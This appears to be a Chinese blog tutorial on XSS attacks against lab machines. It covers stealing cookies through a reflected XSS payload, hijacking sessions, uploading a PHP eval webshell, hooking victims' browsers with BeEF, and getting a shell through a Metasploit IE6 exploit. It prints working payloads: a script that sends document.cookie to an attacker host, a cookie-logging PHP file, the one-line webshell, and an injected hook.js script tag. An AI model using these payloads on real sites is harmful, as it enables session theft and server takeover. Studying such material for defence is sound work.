OWASP TOP 10(二)XSS漏洞(盗取cookie、ms10_220_aurora漏洞、XSS平台)

OWASP TOP 10

XSS

一、XSS漏洞----cookie

1. 盗取cookie

在DVWA靶场上演示。

存在反射型XSS漏洞的站点位置可以利用以下链接来盗取Cookie。

<script>document.location='http://ip/cookie.php文件的绝对路径?cookie='+document.cookie</script>

将连接发送到用户,用户点击即触发XSS漏洞,可以使用URL编码迷惑用户。

cookie.php代码:

<?php
$cookie=$_GET['cookie'];
file_put_contents('usercookie.txt',$cookie);
?>

以DVWA靶场演示:

?uname=<script>document.location='http://192.168.40.129/PHP/XSS-Test/GetCookie/cookie.php?cookie='+document.cookie</script>

在这里插入图片描述

提交结果:

在这里插入图片描述

2. 利用cookie会话劫持
  1. 退出登录,bp抓包

在这里插入图片描述

  1. 上传上面盗取的cookie信息,成功登录

在这里插入图片描述

3. 会话劫持后的操作
  1. 进入后台寻找上传点等进一步利用漏洞,如上传一句话Webshell。
  2. 修改配置等。

上传一句话Webshell:

<?php
@eval($_REQUEST['hello']);
?>

在这里插入图片描述

使用中国菜刀

在这里插入图片描述

成功得到目标主机的信息:

在这里插入图片描述

二、BeEF

使用渗透测试工具BeEF和漏洞框架msf,盗取用户cookie,获得目标主机的shell权。

1. BeEF概述
  1. BeEF,全称The Browser Exploitation Framework,是一个专注于Web浏览器的渗透测试工具。
  2. 框架主页:http://beefproject.com/

在这里插入图片描述

2. 实验环境

kali(攻击者,IP地址:192.168.40.131)
windows 2008(服务器,IP地址:192.168.40.129)
win 7(受害者,IP地址:192.168.40.128)

3. 实验步骤
  1. kali虚拟机中修改beef的默认账号和密码(不修改无法启动beef)

工具目录:/usr/share/beef-xss
配置文件:config.yaml

在这里插入图片描述

启动beef工具

使用命令 beef-xss/usr/share/beef-xss/beef

在这里插入图片描述

web界面管理控制台:http://127.0.0.1:3000/ui/panel

在这里插入图片描述
在这里插入图片描述

测试页面:http://IP地址:3000/demos/butcher/index.html

在这里插入图片描述

shellcode:http://IP地址:3000/hook.js

  1. 在服务器的留言板上插入beef的shellcode地址
    <script src="http://192.168.40.131:3000/hook.js"></script>

在这里插入图片描述

  1. 受害者上线后beef的情况

在这里插入图片描述

  • 获取cookie

在这里插入图片描述
在这里插入图片描述

此后我们只需要在浏览器控制台使用 document.cookie="name=tom" ,即可登录

在这里插入图片描述

刷新页面,成功登录

在这里插入图片描述

三、使用beef和ms漏洞获取shell

1. 实验环境

kali(攻击者,IP地址:192.168.40.131)
windows 2008(服务器,IP地址:192.168.40.129)
win XP(受害者,IP地址:192.168.40.132)

2. 实验步骤

启动msf,利用ms10_220_aurora漏洞(针对IE 6)

在这里插入图片描述

设置SRHOST、设置LHOST

在这里插入图片描述

exploit,生成一个链接,让受害者访问该链接,这里我们可以直接使用beef让被害者重定向页面:

在这里插入图片描述

在这里插入图片描述

此时和目标主机建立会话:

在这里插入图片描述

查看session并使用session:

在这里插入图片描述

获取目标主机的shell:

在这里插入图片描述

三、XSS平台

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

生成了很多代码,包括编码过的,我们选择其中一个插入到留言板中,实现XSS漏洞

在这里插入图片描述

当受害者目标主机访问后,就可以监测到。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值